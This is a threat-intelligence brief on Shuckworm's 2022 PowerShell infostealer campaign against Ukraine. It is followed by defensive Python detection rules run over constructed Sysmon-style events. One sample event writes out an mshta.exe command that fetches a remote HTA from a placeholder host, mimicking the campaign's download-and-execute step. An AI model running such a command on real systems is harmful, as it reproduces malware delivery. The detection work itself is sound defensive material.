Ukraine Remains Shuckworm's Focus
Industry: N/A | Level: Tactical | Source: Symantec
Russian threat group Shuckworm (aka Gamaredon, Armageddon) continues to maintain its focus on Ukraine, according to Symantec's latest report. A recent campaign, observed between July 15th, 2022, and August 8th, 2022, distributed a PowerShell information-stealing malware. The documented infection chain starts with a downloaded 7-Zip archive whose contents invoke mshta.exe to download an HTA file masquerading as an XML file. Once the "XML" file is fetched, the PowerShell infostealer executes, with capabilities to capture and upload screenshots and to run commands issued by the attacker. The PowerShell stealer joins Shuckworm's existing toolset, which includes the group's infamous Pterodo backdoor as well as commodity remote desktop tools such as AnyDesk and Ammyy Admin.
Anvilogic Use Cases:
- Compressed File Execution
- MSHTA.exe execution
- Executable File Written to Disk
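The three use cases above map directly onto the documented chain (archive extraction, mshta.exe fetching a remote "XML", a payload landing on disk). The following is an added example of that detection logic run over constructed process-creation and file-create events; it is not code from Symantec or Anvilogic. It assumes Sysmon-style fields (Event ID 1 for process creation, Event ID 11 for file create), the sample events and the `example.invalid` URL are constructed placeholders, and the 7-Zip temp-directory pattern is an assumption about extraction paths rather than an indicator from the report.

```python
"""Detection logic for the Shuckworm chain described above.

Constructed example: the events below are synthetic Sysmon-style records, not
telemetry from the Symantec report. Field names (event_id, image, command_line,
parent_image, target_filename) are assumed to mirror Sysmon Event ID 1
(process creation) and Event ID 11 (file create).
"""
import re
from dataclasses import dataclass

# Assumed archive utility image names; extend for the archivers in your estate.
ARCHIVE_TOOLS = ("7z.exe", "7zfm.exe", "7zg.exe", "winrar.exe")
# Executable and script extensions worth flagging when newly written to disk.
EXEC_EXTENSIONS = (".exe", ".dll", ".scr", ".hta", ".ps1")
URL_PATTERN = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


@dataclass
class Event:
    event_id: int
    image: str = ""
    command_line: str = ""
    parent_image: str = ""
    target_filename: str = ""


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def compressed_file_execution(ev):
    """Use case 1: a process whose parent is an archive utility, or whose image
    lives in a 7-Zip temp extraction directory (assumed %TEMP%\\7z<random>\\)."""
    if ev.event_id != 1:
        return False
    if basename(ev.parent_image) in ARCHIVE_TOOLS:
        return True
    return re.search(r"\\Temp\\7z[A-Za-z0-9]+\\", ev.image, re.IGNORECASE) is not None


def mshta_execution(ev):
    """Use case 2: mshta.exe launched with a remote URL argument. The report's
    chain fetches an HTA served under an .xml name, so any remote target is
    flagged rather than relying on the extension."""
    if ev.event_id != 1 or basename(ev.image) != "mshta.exe":
        return False
    return URL_PATTERN.search(ev.command_line) is not None


def executable_written_to_disk(ev):
    """Use case 3: file-create event whose target carries an executable or
    script extension."""
    if ev.event_id != 11:
        return False
    return basename(ev.target_filename).endswith(EXEC_EXTENSIONS)


RULES = {
    "Compressed File Execution": compressed_file_execution,
    "MSHTA.exe execution": mshta_execution,
    "Executable File Written to Disk": executable_written_to_disk,
}


def evaluate(events):
    """Return (rule name, event) pairs for every rule that fires, in event order."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev))
    return hits


# Constructed sample telemetry approximating the documented chain.
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Users\u\AppData\Local\Temp\7zO4C1A\lure.exe",
          parent_image=r"C:\Program Files\7-Zip\7zFM.exe",
          command_line="lure.exe"),
    Event(1, image=r"C:\Windows\System32\mshta.exe",
          parent_image=r"C:\Users\u\AppData\Local\Temp\7zO4C1A\lure.exe",
          command_line="mshta.exe http://example.invalid/update.xml"),
    Event(11, image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          target_filename=r"C:\Users\u\AppData\Roaming\svc\agent.exe"),
    # Benign control event: should trigger nothing.
    Event(1, image=r"C:\Windows\System32\notepad.exe",
          parent_image=r"C:\Windows\explorer.exe", command_line="notepad.exe"),
]

if __name__ == "__main__":
    for name, ev in evaluate(SAMPLE_EVENTS):
        print(f"[{name}] {ev.image or ev.target_filename} :: {ev.command_line}")
```

Each rule is deliberately independent so the three alerts can be correlated by host and time window in a SIEM; on its own, the file-write rule is noisy (installers, updaters), and it earns its weight when it follows an mshta.exe network fetch on the same host.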